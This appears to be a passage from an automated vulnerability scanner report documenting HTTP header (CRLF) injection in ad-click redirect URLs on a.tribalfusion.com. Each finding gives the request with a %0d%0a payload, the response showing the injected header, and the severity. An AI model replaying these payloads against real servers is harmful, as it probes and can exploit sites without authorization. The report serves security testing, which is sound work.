GET /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/a4cac%0d%0a09ac87d2afa/www.reachout.com/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Location: a4cac
09ac87d2afa/www.reachout.com/
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload cd2cc%0d%0aaa4ca5c4189 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/cd2cc%0d%0aaa4ca5c4189/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Location: http:/cd2cc
aa4ca5c4189/
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 2ddfe%0d%0a0901c3be52f was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/?2ddfe%0d%0a0901c3be52f=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Location: http:/www.reachout.com/?2ddfe
0901c3be52f=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f5a19%0d%0afc20db3ebd2 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/?f5a19%0d%0afc20db3ebd2=1 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a3nh31M0iHHBE0uBQoKI56mjOlRsDVgC7iBgKy9FUgXjmYY9O9kaFh8SOkZaj3tSZbfqZctTGSNPPPZcmwxRy1ftAjr7WIr74noBDakkG1ZaL0XThVHteULITvf1GEPrUjCj5srmTHwAw20yvnOvqwn9FBwh9rkhlX3AiepVYXQH9jCImMT56vNvZaSsEL04gLZdEFjVJgPG3kZaUnVjAagwn9aJlyok54ruHRc8TyMii3ds4VNsmLgtJNPZaq4Ya0Dr5TtlAmRJaMeP6LMsCPMB4Zbd4IiuB3aZa8BA7PHatkU5g9v7Pp5HUBYsTZa8UoKvwTVtFFmvmR3tJ0EAtrKtpsLxhZa3uwh3k5uZbvJ06cnFcN4JMgQViaJd38KAUkZctI3ZbqBGjgSAr6sQwwHtypeJMcAF8hXNWmQBrmjIiQ7k8S9PothRuWnJ1ZaaDiSZcfMvOZcg4D17uMOZcdTYCxDqlZarXkZb05ZcfrFFgNPFmKG; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:18 GMT;
Content-Type: text/html
Location: ?f5a19
fc20db3ebd2=1
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

Issue detail

The value of the ord request parameter is copied into the Location response header. The payload 378e3%0d%0ac81c5b2e403 was submitted in the ord parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/;ord=378e3%0d%0ac81c5b2e403 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=alnh31tZdPZcF3rIxRrghNed7LF9YWUJl8aZb520eLyVqoqi32renGbQZajW4XZdiJW0hFi8TkEEMTyr2UYSXrSmZb9P4ZaSLp6inPfZaVlOqLBVbKgo8OTA0nHbYeMbqZdZcQr4KdZcsdEPBw4pKCe2O0mt5Zb86rsyjWoZcH6lswqbZc9wJyqg4Oodufp7Ro3VK3RP9flDZcZb8FKp8sHwfUVITY7ZaQ8AXH4tuN3w5ZdZdjbRZcqhF7fVZcDSE6CJda3RjEZa38kaNkagdHq6hhqH0rtqqnblCADgIfAZagenlo5vgIVqt7FYYU88iTPxPd5ZaoZawZdKfZaM3ZdMWOEuU536gjc7GiOZcqg5UMBVEBMZbbmdbPjlaAIF6TJxwj8G29k994B8QYtRerLvKgZaEgDuGuZc9wTrpcmhan4to68kdQnNZcrbeDYlOZaYM6I2I6QfY6JlZak4Asj4yFZbFPF6b9L9Gnpl5rOXuUU6esPk0XMV3uTwct3S; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:07 GMT;
Content-Type: text/html
Location: ;ord=378e3
c81c5b2e403
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload cfad9%0d%0a7190c6dbafc was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/cfad9%0d%0a7190c6dbafc/pixel.quantserve.com/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=ahnh31m5aSZb8e9wPQIj1pvoeZd94UDt69LXCLtVEbF1WZai53mDNZboMeDj2ggUM6PsU4aXcU6KBVvakyQg3aNORLWQknbnBudtwwTi6G7PV5i6sw1oCJra3ZcWaOi7ClZceMgU4uaVfMCSZbaYm6bU6xbFIZdZbjMZceZaCjdlXZdLjIhJppOl7fIKit1YV8fhiTke7dwwgSvTGeCsY3bZaQYqVoECQ4TEPCEZcPvcalCxZduGgxaeIP304xfxDlY4Q0WpfcedyfqLEkrUa3bDfZa7xEStJ3w1e7CXqDe9AA3cpDje8BEYn9yOLSFIKJlqjnhC7VsYZcnwhXy4FU5hdwZahsNBZd0bYVeKnYXlZcZcCfufga8e4GfpOf7cEXL47ZcmQZaXQUMNLt94R5lAxtAoEZaSFjejRaAn8f32Zda4QJeilY8ZdICmZcbsTCpy1xXVPfSudhxQ2oMNTHXuVmZb0lpYsKZdrhUmLZcB3kgWqn7W5ROIex; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:33 GMT;
Content-Type: text/html
Location: cfad9
7190c6dbafc/pixel.quantserve.com/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 8b0b6%0d%0af4319473f03 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/8b0b6%0d%0af4319473f03/r HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=a0nh31S3niHXefpPrvfZaebdvvEXQDvgPYfXkGTBZdlSxF75wGU7ZdFuw8cgUZc5E8VZajHHbSd3aPdusOHUXgKFZchZbMpveTVIViZbl5WDUZc9sZbff70JxffOvlMs3i4X6jiMoLtuH181u1fY7rUe4wBZdZaNKonKPLbtS56xLkOZc9lG7E45WrPFvx2CAamwFKCfBIluOvAfjGJGVvTFZb7kR5Eb3t709vbl0qZaPP8RrfuM2axRIrvWGpB0CKv72ZaySNChS50HkGPxbQAMDwOGKbMkvoA6QxGNyHtfaMI0Vdd35E4NuZbtWYhT7LIkZbZdJDkXZcXXiObsTLgLtr1bEb9bOTpOkHiiwvgdawaAcYNLMhZb8NXWZd4JJ8MxhyfR3k0ZcEy57rBxyL3AgfoKD4KZcHCHm7Ud9hSyjx1lBdrkpXrXf70aI7fokTPwptkA1UGQW8BMREHL6ZdbDoHvQZcTcwtWdGtfMZaYPnwBlZb0EDZbf; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:25:50 GMT;
Content-Type: text/html
Location: http:/8b0b6
f4319473f03/r
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload bc699%0d%0a28b72215d10 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/bc699%0d%0a28b72215d10 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=atnh31riIBGMJL2Biib4Jxiu7f0WpH7HUpOy9uIM8AqTbIrHFjErZbC9Uo0LOOIRZaFy6Gbhd6atQ43ruiJAu5hDN5CFZb3ZdHARoup4ZaJHRVQkYJvZcH4UlOanDmduZcv5ma0StFKOpGpwyYg53DZaNfPnFuKbakZaJG1IoaPRH0NobZa6eBihGJkPPkm762puZbTifFBkciNyffw5DlvnTV5JV9pRtbDhmspSoZbLw02jyJ0k1fKgkpHJgqO0Vu7J5fpifBvn4ke1FvcZawWq8LH3NADPt6b9xbKaOTC9G53LHvuZaZcDxDWnScutjPuZa63Ggwv7kiFZarBRFV8jlGWuHVxrXZaVPmMQPjQwEmcl7s3GZc14cUvfZdXHTSRDZci3ZaO07gMbAkPT1TfTsphh5qxoIh7KFt4HnHF8wIqf5653qRND1uHELwSfKX6hKFhRDuNZc1eBNniMn5ZckliSXpdZbsu3pDrSKZaJwefQTEu6LC; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:26:04 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/bc699
28b72215d10
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of the a request parameter is copied into the Location response header. The payload de792%0d%0adb8b6b2f830 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=de792%0d%0adb8b6b2f830&vehicle=altima&dcp=zmm.57350078.&dcc=40424790.233402132 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aXnh31OZb36HmPr3SMWFeIRfvBmPHOwZc9bgPZcyyCZdCbxnjoyVv5ZdtqC6Hc8F3F9RxfXZaFtjxqM527dCRyZdPJJpIm8B1PnAQlZdgtLjoAefn0hbwYLwZc8u9PJJXPntRKxOWZcMv2kbVZaJZas0kwOmQnwsZbBT4RVd0gk3lm4HSoZcemp3UVeuqlFX8PqZbC1teWW0rAn4jBVOdMgJC6FOoOkTvUJo2Wtartlw6ZdvkXY2sLTdTGOBij9e3ZbB5KwZadKat8dWBqaflt4NnuT4wRRgZd8DprRRFkZcHZaJXZbhktKNkT8QTrsM3UsOHyM2FegEaYnWFZa1pZaevjpMpEg90Ep1nNXPg326IKDWmUgSMmDP3eZdBYYrZcwRVB8ohifa3jSoJGoTNkaQ86Yg5sdMpd1pSuZaMTb4DlalVyvV5DLDCfyFuWnfrZcR6hqSVGPZbiPZcXcoIgyuBpQYC688pZbS9NLrPYbEIYJRkpofiW9HR1p; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 17:24:34 GMT;
Content-Type: text/html
Location: http:/pixel.quantserve.com/r;a=de792
db8b6b2f830&vehicle=altima&dcp=zmm.57350078.&dcc=40424790.233402132
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

Issue detail

The value of the dcc request parameter is copied into the Location response header. The payload b2393%0d%0a04e19a6bbd5 was submitted in the dcc parameter. This caused a response containing an injected HTTP header.

Request

